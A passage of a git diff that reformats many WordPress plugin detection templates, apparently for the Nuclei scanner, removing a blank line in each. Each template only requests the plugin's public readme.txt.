a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index adf3387ddb..585da1a9ef 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/pixelyoursite/readme.txt" diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index eb6e1aaa5d..862f73201f 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/polylang/readme.txt" diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index b3c83cd0bf..415cc6c80e 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/popup-builder/readme.txt" diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 96d8bd6aca..9ee0148adf 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/popup-maker/readme.txt" diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 85955ac95e..a78ffef37b 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/post-smtp/readme.txt" diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index a81fc892ca..305d74e8ea 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/post-types-order/readme.txt" diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index d9c6052cd7..668162fc4e 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/premium-addons-for-elementor/readme.txt" diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index afc1141e0c..2a233f389d 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/pretty-link/readme.txt" diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index d44add9ca6..a0d2554492 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/really-simple-captcha/readme.txt" diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 20ba5c2e16..ae99fbfc17 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/really-simple-ssl/readme.txt" diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index cbcf3cf09d..f44cee7980 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/redirection/readme.txt" diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 3311d42c94..39130db767 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/redux-framework/readme.txt" diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 46c1c22805..39c497073c 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/regenerate-thumbnails/readme.txt" diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 7c13b8d2a4..4d10178692 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/safe-svg/readme.txt" diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 53b30ba721..0f0ba43ba3 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/seo-by-rank-math/readme.txt" diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index dc3d446af3..4d27284751 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/sg-cachepress/readme.txt" diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 96b4699d2d..f69b343dce 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/sg-security/readme.txt" diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 17584cd064..fffdc7d017 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/shortcodes-ultimate/readme.txt" diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 015fb97043..7a9746a70d 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/shortpixel-image-optimiser/readme.txt" diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 1d5224b457..3fe86debf5 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/simple-custom-post-order/readme.txt" diff --git a/http/technologies/wordpress/plugins/simple-page-ordering.yaml b/http/technologies/wordpress/plugins/simple-page-ordering.yaml index 3f16340af9..82d89e42be 100644 --- a/http/technologies/wordpress/plugins/simple-page-ordering.yaml +++ b/http/technologies/wordpress/plugins/simple-page-ordering.yaml @@ -14,7 +14,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/simple-page-ordering/readme.txt" diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index aafd6c6a38..3deac58709 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/siteguard/readme.txt" diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e10ab985da..e7e7c27682 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/siteorigin-panels/readme.txt" diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 9881b591ae..ad4ebefa4b 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/smart-slider-3/readme.txt" diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 69c367b8d5..8e88c81c0a 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/so-widgets-bundle/readme.txt" diff --git a/http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml b/http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml index f2bd03721d..b0e30d946e 100644 --- a/http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml +++ b/http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml @@ -14,7 +14,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/ssl-insecure-content-fixer/readme.txt" diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 26d525386b..fc126d83c6 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/stops-core-theme-and-plugin-updates/readme.txt" diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 3920c5cf56..8c49a34259 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/sucuri-scanner/readme.txt" diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f556786f5a..c20ed6552a 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/svg-support/readme.txt" diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 844e3d19a0..6ac2212b4b 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/table-of-contents-plus/readme.txt" diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index eb0f02f602..71c71b5ed1 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/tablepress/readme.txt" diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 755efd53fa..7b47adc274 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/taxonomy-terms-order/readme.txt" diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 0403bb4e72..c4928059f6 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/the-events-calendar/readme.txt" diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml index cd2632ea05..d8fa3be308 100644 --- a/http/technologies/wordpress/plugins/themeisle-companion.yaml +++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/themeisle-companion/readme.txt" diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index b5f8b822c7..f6a7836f35 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/tinymce-advanced/readme.txt" diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 85aaf7ff16..b7af708c4f 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/translatepress-multilingual/readme.txt" diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 0af322b728..7cc77cfc4d 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/ultimate-addons-for-gutenberg/readme.txt" diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index d4ac0d179e..0da88d5d3f 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/under-construction-page/readme.txt" diff --git a/http/technologies/wordpress/plugins/unyson.yaml b/http/technologies/wordpress/plugins/unyson.yaml index 2d5ddc334f..893ec7c172 100644 --- a/http/technologies/wordpress/plugins/unyson.yaml +++ b/http/technologies/wordpress/plugins/unyson.yaml @@ -14,7 +14,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/unyson/readme.txt" diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index dbbadf3cfc..65283ec3e1 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/updraftplus/readme.txt" diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index 401b0e479f..3b41f89d47 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/use-any-font/readme.txt" diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 6f95506748..181e619a7c 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/user-role-editor/readme.txt" diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 4404f87aab..259dcb9b90 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/velvet-blues-update-urls/readme.txt" diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8995434fce..8164eb4483 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/w3-total-cache/readme.txt" diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 8175806cb8..59554defdf 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/webp-converter-for-media/readme.txt" diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index db82bc7f43..350fd9436b 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/webp-express/readme.txt" diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 03ddae57bc..2ae6bafbba 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/widget-importer-exporter/readme.txt" diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d6449bb5bf..d0dc8d92bb 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/woo-cart-abandonment-recovery/readme.txt" diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 2d5fdf1779..c49bbc2b6d 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/woo-checkout-field-editor-pro/readme.txt" diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 6b5705e20d..27586cbd9d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/woo-variation-swatches/readme.txt" diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index dbcdb64bad..4faaa3f4d6 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/woocommerce-gateway-paypal-express-checkout/readme.txt" diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index fb9ea502ce..946272f0a9 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/woocommerce-gateway-stripe/readme.txt" diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 48ffb25245..6005d7417b 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/woocommerce-payments/readme.txt" diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 4fa6fc3ffe..e83e8d79e7 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/woocommerce-paypal-payments/readme.txt" diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 1c1c690fcd..f1c16275a2 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/woocommerce-pdf-invoices-packing-slips/readme.txt" diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 4d6702d81a..fc072e19d8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/woocommerce-services/readme.txt" diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 42cb8bc409..da9df0e8a5 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/woocommerce/readme.txt" diff --git a/http/technologies/wordpress/plugins/woosidebars.yaml b/http/technologies/wordpress/plugins/woosidebars.yaml index 0ed73eff04..96c4244db6 100644 --- a/http/technologies/wordpress/plugins/woosidebars.yaml +++ b/http/technologies/wordpress/plugins/woosidebars.yaml @@ -14,7 +14,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/woosidebars/readme.txt" diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 55d6effbf5..f8113d9750 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wordfence/readme.txt" diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 6786cab703..5f80282ab2 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wordpress-importer/readme.txt" diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 784ba22c8a..5725d5bb3f 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wordpress-seo/readme.txt" diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 72ff55e58a..f67a8bc18a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/worker/readme.txt" diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 8cfaa0f5a9..b9bd4be0a8 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wp-fastest-cache/readme.txt" diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 85900a01a7..bece4ce486 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wp-file-manager/readme.txt" diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index a7ccde0b49..138b0aa9a6 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wp-google-maps/readme.txt" diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 422664a98c..68bf71bc83 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wp-mail-smtp/readme.txt" diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index f0af3a748a..10dad2d2fb 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wp-maintenance-mode/readme.txt" diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index f89f1a20b3..e9efe6fb53 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wp-migrate-db/readme.txt" diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 01fb12d0ad..c3d10f0135 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wp-multibyte-patch/readme.txt" diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 1773857e15..115e8e937b 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wp-optimize/readme.txt" diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index bcd1509c68..d2c74355bd 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wp-pagenavi/readme.txt" diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index c6aca20a60..94b8494b08 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ 